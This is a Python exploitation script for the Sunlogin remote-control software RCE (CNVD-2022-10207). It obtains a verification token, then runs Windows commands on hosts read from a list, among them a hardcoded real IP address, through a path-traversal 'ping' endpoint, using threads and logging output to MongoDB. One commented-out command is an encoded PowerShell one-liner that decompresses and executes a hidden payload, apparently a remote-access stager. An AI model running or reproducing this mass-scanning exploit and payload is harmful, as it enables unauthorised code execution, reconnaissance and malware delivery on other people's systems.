import requests,threading,os,urllib3,json,pymongo
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

client = pymongo.MongoClient(host='localhost', port=27017)

db = client['test']

mycol = db['sunlight']
#fofa: 
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35',

}
filename = Path(__file__).name.strip('.py')
line_break = '\n'
file_path=Path(__file__).resolve().parent
result_path=file_path/'result'/f'{filename}.txt'


proxy={
    'http':'http://127.0.0.1:7890',
    'https':'http://127.0.0.1:7890',}
def exploit(url, index):    #写入MongDB 数据库
    try:
        dic={}
        dic['url']=url
        vul_url = url + "/cgi-bin/rpc?action=verify-haras"
        reps = json.loads(requests.get(vul_url, verify=False, timeout=5).text)
        verify_string = (reps['verify_string'])
        cookies = {"CID": verify_string}
        # commands=['whoami','net user','ipconfig /all',"netstat -an ",'systeminfo','tasklist']
        commands=['ipconfig /all']
        for command in commands:
            poc11 = url + "/check?cmd=ping../../../../../../windows/system32/" + command
            # poc11 = url + "/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami"
            poc_reps = requests.get(poc11, cookies=cookies, timeout=24, verify=False).text
            if "Verification failure" not in  poc_reps:
                print(index,url)
                print(command," : ",poc_reps)
            dic[command]=poc_reps
        # print(dic)
        mycol.insert_one(dic)
    except Exception as e:
        pass

def exploits(url, index):
    try:
        vul_url = url + "/cgi-bin/rpc?action=verify-haras"
        reps = json.loads(requests.get(vul_url, verify=False, timeout=5).text)
        verify_string = (reps['verify_string'])
        cookies = {"CID": verify_string}
        # commands=['whoami','net user','ipconfig /all',"netstat -an ",'systeminfo','tasklist']
        commands=['whoami']
        # commands=['net view /domain']
        # commands=['ipconfig /all']
        # commands=['powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEMARQBLAE0AMgBjAEkAYgB0AGYAUQBBADIAOABSADQAdwBXAEMAVwBtAEwAdwBvAEsAdABzAEYARgBIAGcAdABsAHcASAB6AHAAdgAvADcAbABBADAAawA2AGUAbgAwAFQARQBzAHoAUwBNAGgAVgA5AGwAMQBPAG4AYgB2AFUATgBTAEMANQBOAHcAaABHAE4AbABFAEQAQgB6AEwAMwBjADQAaABqAEYAUABnAE0AZAAzAHUANwBTAG4AeQBiAFoATwB0AHMAOABiAGEARwA1AEMAMwBFAGcAZgAwAEcASABBAGYARABPAEcAYgArAHYAcgAzAFIAQQBRAFkAZQBVADcAegBiAEEALwB6AG0AQgBVADcAaQB3AGcAcQBUAGIAegBKAEIANgBDAFEAWQBsAG0ANQB1AGIAbQAvAHkAVgA0AGsAZgBnAHgAVgA4ADgAdwBGAEIAZQAvAGoAbQBRAGIASQBKAG4ASgBqADUAeABoAFIAZgB1AG0ASABJAEIAeAA1AEEALwB1AHMAZgBmAC8AUQBUAGoASwBGAFAAegB2AHYAcQBBAEoASgB1AEgARQBQAFAAYwBoAEcATQBpAHkAWABtAG4AOAB4AGkAQQB6AEcAOABIADEAbABiAGEAQgBQAG0AYgArAGIAdQByAFQAcAB3AEEAdwB1ADQARgA3AEcAMABEACsAdwBOAFAAVQBYAFgAZAA3AEoAdgBTAG0AQwBEADcAQQBSAFYASQAzAFEAUgBLAFIAYgArACsAcQB0AFEAZQByAG0AdgB2AFYAYQBGAEsAQQBGAHUAWABDAHcAWQBhAFUAeQBnAFYAMwBWAGMAdAAxAEIAaQB2AHAAYwB5AGgAOQBNADAAaABNAFcAQwBpAG0AdwBjAHgATQBHAEsAVgBCAGYASQByADMAUABWAFcAWQA1AGUAeQA4AEcAcgBaACsAeQBGADAAdQBWAGsANgB4AEQAUQBjAC8AegA2AGsASgBuAFYAcwAwADYAeABRAEoAYwA2ADUAYQBaADcANQByAEIAUQBZAFYANAB5AGYAeQArAHYAcgA4AHkAZgA3ADIAZwBtAGkAVQArAFEAQgA2AHUAUwBUAHkAQQBPAFEAZwBQAGkAUABiAEoAaABYAEgAMABDAHYAdQBQAEMAQwBWAHgAUgB0AFUASgBNAFkAKwBhAHYAQwB5AFUASwBBAGsATwBTAFkASgArADUAWQBxAEYANgArADIAQQBIAGkAMwBkACsANAByAG8AVgBhAHYAZgBsAGQAKwAyACsARgBqAFYANAB1AEoATAA3AHUAMAByAEYAegAwAHAAVQBTAGkAZQA0AFYATABuAGsAeABPAC8AUQBvAGUAWgA1AGMAegBaAEgAagAvAE0AVAArAGsALwBKAFYAYQBLAC8AbgB4AEsAcwBkAFAAdgA5AHEAMQBSADEAbwBBAHYAWABnAE0AQQAzAFEAdgBuADkAbABLAHUAMwBOAHoAYwB2ACsAUgBMAFMAOAB4AFQAMQBJAEUAYQA1ADMAagBlAEcAcgBUAEEAcQBCAFEARgBJAGcATgBNAHMAbgBGAE8AYwB3AE4ATAByAFIAMwB6AE8AYgBxACsAYQBjAGUAVwBYAGgAbQBwAFgAcgBZAHYATwBPAFQAeABuAEgATgArAFkAbAAzAG0AQQBuAE4AZgBiAG0AOQBMAHQASgBYAHUAeQA5ADIAOQBXAGcAbAB3AEgANAB1AHoANwByADYAdQBCAGgAeQB2AGsAUQB6ADcAMQBnAFkAZgBzAGEAOABJAFgAdgA0AG8AWgBYAEwAawB3ADUANgBOADYARgBkAE0AbwB6AG0ATABoADgAZwBFADYALwBJAFcAZABRAGsAYgBvAHkAOAA5AHEAZwBvAGYASQB1ADIANwB2AEQASwA1AHIAMAA3AGoASABGAEIAVgBOAGkAZABLAFAAWQBNADQAeABMAEIAWQBrAFgANABVAGUANQBlACsAOABwADIAbAA2AHQANgBKAGwAQgBxAC8AUwBsADkASgBLAHIAOQA2AHoAZgBaAGIATABmAFIAZgBFAGMAWQBYAFIARQAxAHIAbgBkAG8AVQB4AEkASABDAGgAVQAyAEcANgBmAG8AdwB1AG4ANwBvAEoAQwBmAEoAbAA0AFEATwB1AG0AcgBnAEUAMgBTAEEAbQBWADMATwB2AHAAUwA4AG8AdgBiAGoAdQBCAHoANgB0AG0ATQBTAG0AMABhAFUAMABUAEkAMABRADIAZwBpADQARwBTAHMAVgA1AGcAawA1AHMASgBjAGEAYQBIADIARgBVAFAAaQBTAGsAegA1AHcAWABWAHAAeQAxAE4ASwBlAHgAbwBTACsAeQBiAGcAdwBTAEoAWQB6ADIASwBuADgAZQAzADYAVQBxAGcAWQBrAGsAaABlADYAMABLAFAAUwBlAFIAYwBTAFgAYgBDAG0AUABlAGQAUwBVAFgAbQA2AGcAVABWADAAQwB2ADgAQgA5AHIAVgBPAHoAawBXAFIAYwBYAFUAbAA2AFIATgBvAG0AZwBDAEcARwA1AEEASwBNADAAZQBZADAATAA1AFcAcQBQAHkAVQBlAFAAOABiAHYAQgA5AGIAegBBADgAdwArAHgAaABlAEEAbABuAE0AQwAxAEYAYQAwAFkAWgArADcAZwBLAFUAbgBSAGkAZABhAEQATwBHAEUAZgBOAFkAeQBrAHIAdwBwAFoAZQBTAHIASgBaAHkATQAzAFoAMgAzAFgAeAA3AEoAegBxAG4ARgBSAE8AcQBKAE8ATABBADYANABFAFkAdABoAHAARwAzAHUATwBLAGgAVABxAFgAcgBJADgAZABYAFcAbQBsADYAbABiAGkAaABxAG4AcABhADAAZgBiAG4AMgBOAGgATAB3ADUAQQBhADMATQBjAGMAMABsAGcAVAB3AG0ATwBuAGcAUwBlADcAaQBjADIARgA4AGYAdQB3AEEAMgB0AGoAUgBLAEIAbwA3AEwAZABIAGoAdgA5ADUAMQBUAFEAdQA1AHkAQwBXAHEAaQBKAHAARQBUAHAAbgBYAHcAUgAyAFIANwBWAEcANAA4AEMAYwA5AEwAQgAwAGwANABUAEEAegBkAHUAeQAzADEAeABNAFEATgBvAEcAKwBXACsARQBxADkAUgBjAHcAUwBRAEsAaQBlADcAdABjAEUAagBEAGcAYgBtAFEAWQB1AGsAdgBkADUAMQBGAG4AdQA3ADUAYwBtAEIAMgBDAEoAVQBkADUANABJAFMAWQBpAEYAWgBLAFMAYgBpAFIASQBwAG4AbwBRAGEAbQB6ADAALwBKADgATwA5AE4ASABoADgAawBqAGsAVABQAEwAcABXAEcAKwBiADYAVABwAFQANQBNAHEAUAAxAEgAbQBUADcAVQB5AGYAYgBvADYAZwBQAGMAZQBiAEgAcABPAHoARABlAHEAMABGAEYAOABPADIANgBZAGMASQBMAHAATAAxADYAYQBBAGgAMgB6AG4AeABrAEIAdgBTADkAMABtAGcAMgBtAEYAYwAxADAANwAyAGEAcgBmAGIAZwByAEEAMgBNADMAWQAxAGUAVABwAGIAUABsAE4AdQBhAGkARABDAG8AdABYAEMAaABoAG0ANgArADMAbAAzAHQAcQB2AHIAUwA1AHgAagAyADQAcwBVAG8ANQBiAGgAUgBEAFkAMwBQAEoAbgBoAGIAdQBuAE0ASQA2AEcAdQBXADkATABzAHkAYwBWAFIATQBrAFIAZQB1AG0AdABLADYAVQBYAEcARwA2AGEARwAwAGEATgBQAGUAZQBuAEkAMABXAFAAVABPAFgASABwAFUAOQBnAEEATABZAHcAbwBwADAAZgBxAHAANQAzAHgAYQA4AC8AaQByAGIAUQBZACsAZgBhAHoAaQBEAHgANwB3AC8ARwBUAHIAZAAzAHgAawBxAGgASgBjAFQAZQBlAHQASwBIADgAZgBNAFEAUgBHAGUASgBvADcAMABiAE4AawBXADUAbgB1AEgATwA5AFQASAA3AGMAYwBFAGMAMQBLAGgAOQBaAFcAMABVAEcAWgBRAG0AcABXADkAQQA1AHgAWQBvAE0AOQA5AGsANgAxAFgAbgA1AG0ARQBwAGIANgBUAEgAcABaAFgAcQA4AEkAQQBiAFQAaABiAEIAdABjAGcAMQBrAEQAZwBjAG4ANQBUAFQAZQBwADUATQBwAHMAUABnAG4AWgA2AHQAMAAvAEcAaQB3AHMARAB4ADkAMQBwAEUAZgA1AGUATgB5AG4AVQBaAEoAWgB5AGUAZABaAG8ALwBzAHAAQgBtAEoAYgBWADIAeABZAEUAdAA0AFcARAA4AC8ATwBYAEgAZABIAGsAOQByADgAbABiAHEAZABIAG8ARABiAG0AcwBsACsAaQBZAFoAbQBhAHUAVwByAFMAdwBlAGYASABVAC8AMgB4AGcAYQBOAHgATwBXAEUAOQA0AGIAQwBwAE4AZAA3AFgAawB3ADEAcABLAHAANgBNAHAAVAB0AHQAUABuAGUANgBZAG0ASABGAFIAbABMAEIAeABIAE0AMwBiADQAYgBPAHgARQBmAGIASgBaADgANQBiAGYAaQA1AFoAcgAxAFIAQQBPADcASABUAFEAMQBWAGcAYQBrADYAZQBwAE8AQgBsADMAdQBWAHEAOQBlADUAeABwAHcAbQBUAE4ATwAwAEsAbwBpAFIAUABiADcATgBiAGkAdQBYAGkAawArADUAbwBvAFQAOQBpAGwATgBqADgAYwA1AHYAeABFAE4AYgB0AGMARQA1AG0AKwBHAE4AcgBkAEkASgBFAE4AVgBXADAAOQBLAEUAZQBCAFcAQwBIAGIAQgBlAFYAMgAwAEYAdgA2AEcAMABrAFkAbABxAG0ATwArAE8ARAAwAEIANABOADkAcQBnAGkASAB1AFgAVABVADIAcgBHAG8ATwAyAHkAZAA2AEIAdABGAEcARABkADcANwBYAFkAdAA3AFMALwBtAGoAVQA0AGIAbQBDAGUAaABJADgAZgBzADgAOQBJAHUAZwA4ADUARABPADAAbwBhAGcAbABlAGIARABkAEoASgBUAFQAOQB3AGwAbQBnAGgAcgB5ADEAcgBtAEQAZQBOAE0AYQB3AFAAZABPADIAeAA1AHcAcQB1AHMAZQBUAEwAegBtAG0AegBaAG4AdgA5AHcAOABKAC8AaQBFAC8AUwBUAE8ATgBOAC8ATwB4AEcASwA2AHMANQAzAHQAQQBnAG0AdwBOADcARwBEADEATQA1AHcAZABuAEcAaABnAFAANABtAHIASQBzAHQAcwBqAEoAdwBjAGQAUwBWAFEAMwBoADkAMABHAHQAMQBFAGEAbgBVAFoAcQBFAEoASwArAHoAQQArAGEAaAA5AEcAegBIAG8AQwBGAHMAVgA0ADIARgBMAE8ATQAwAGEAdwBSAGIAYwAxAFkAQQBiAFYAQQBRAEwAegBqAG4AdgB5AFYAdgBWAEYAUABWAHAAMgBRAHgAMwBKAFgAUABkAEEAQgBhAFQAagBwAFQATABpAGsAMwA2AHcAMQA0AFEAVABZAHoAVQBlAFAAYgBXAHIAQgAxAGcAegByAFUAegBjAFEAYQArAGUAYwBqAHAAWQAwAFYAMgBtAE4AeQBwAFoAMAB5AG0AcABWAEIAbQBaAGUAcwAvAEkAUwBOAHAAegBEAGsAWgB3ADQAMABPADQAZAA3AEUARQBTAEgAZQBtAGYAcABUAGwAWgBYAGwARABaAFEAeQBZAFQAUgBSAHoATgBhADkAVgBhAFIAQQBlAGEAMQA2AEQARgArADkAMgBXAHQAWgAwADMANQAyAEwAVQBuADIAQQBwADYAZABPADYAdAAxAGgAWQBKADIAMgBRAG0AbAB1AEoAMgByAFgATAB2AEwATABYADIAbgBhADkAMQB3AFgAOABSAEoAbwBLAGEAMwBZAG0AagB0AG0ARgAwAEYAZQBYAEQANwBQAEUAeQBOAHYAawBLAHMAQgAwADgAagBsAG0AMAA4AFEALwBHAFAAcQA4AGQAdwBuAHoAMwB1AHgAbwBpADYATwB0AE4AWAB0AGYATAB1AGYAdAA4AE8AYgA5ADAAOAB2AGQAOABmAFUANgBRAHIANwB2ADcANgAwAGoATgBWAGQAdgAzAHQANQA4AHYAOAA0AEsAZQAvAEMAcABZAC8ANQBxAE0AbABNAEIAagBqAGYAQQBwAFoAMgBVAFQAbABmAFgAdQAxAEUATQBzAEgAaQBaAGsAZgBRAEEAWgBSAHIARgA0AHQAZABqAC8AUQA1AGkASAA3AHAAMAA1AEsAVgBEADgAZgBWAEcANgBiAHAAdQBZAEcAZABUADMAUwAvAEcAcQB6AC8AZgBlAHoANgA5AE8AVwBkADAAVwBlAGUAKwBYAEoAVQArAEwAbwBkAFMANgBYAHIAdABXAGMAbABxAGwAWQA4ACsAbAB5AE4AZQBKADgAQwBQAGEAMgBSAEoAegAxAGYANQBSAEsAUQBDAC8AVABYAFoAVgBCAGoAMgBXAEcAZABaAE4AbgBzADIAVwBHAHIAdAA5ADQAbgBwAEIAMgBGAGEAZgBMAGQAWAB5AFcAYQAvAFQAMQBBACsAdQAzAEoAegBWACsALwBEAEcAawA1ADgARAAvADQAZgBZAC8AQwBEADEALwAvAE8AYgBzAFoAZgBQAGoAOQArAHMASgBjAGoAKwBwAHEAeQA3AEUATAArAEYANQAzAGwAeABUAGoAZgBEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA']

        for command in commands:
            poc11 = url + "/check?cmd=ping../../../../../../windows/system32/" + command
            # poc11 = url + "/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami"
            poc_reps = requests.get(poc11, cookies=cookies, timeout=24, verify=False).text
            if "Verification failure" not in  poc_reps:
                print(index,url)
                print(command," : ",poc_reps)
                with result_path.open('a+') as file:
                    file.write(url+line_break)
        # print(dic)

    except Exception as e:
        pass

url='http://117.172.165.247:1029'   #cjngy.com
# url='http://103.27.77.56:49672'
# exploit(url,1)


threads = []
# with open(r'D:\Downloads\tmp\sunlight.txt', 'r') as file:
# with open(r'D:\C#\VSCODE\python\POC_EXP\代码执行_命令执行\Windows\CNVD-2022-10207向日葵RCE\file.txt', 'r') as file:
with result_path.open('r') as file:
    urls = []
    for index, line in enumerate(file):
        start =0
        end = start+400

        if index >= start and index <= end:
            urls.append(line.strip(line_break))
            # if index==:
            # break
            ip = line.strip(line_break)
            print(index, ip)
            exploit(ip,index)

            thread = threading.Thread(target=exploit, args=(ip, index,))
            threads.append(thread)
pool_size = 15
# print(urls)

test = 'mt'


if test=='t':
    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()
elif test=='m':
    # 创建线程池
    with ThreadPoolExecutor(max_workers=pool_size) as executor:
        # 提交每个 URL 的请求任务
        futures = [executor.submit(exploit, url, index)
                   for index, url in enumerate(urls)]

        # 获取每个请求的结果
        for future in futures:
            result = future.result()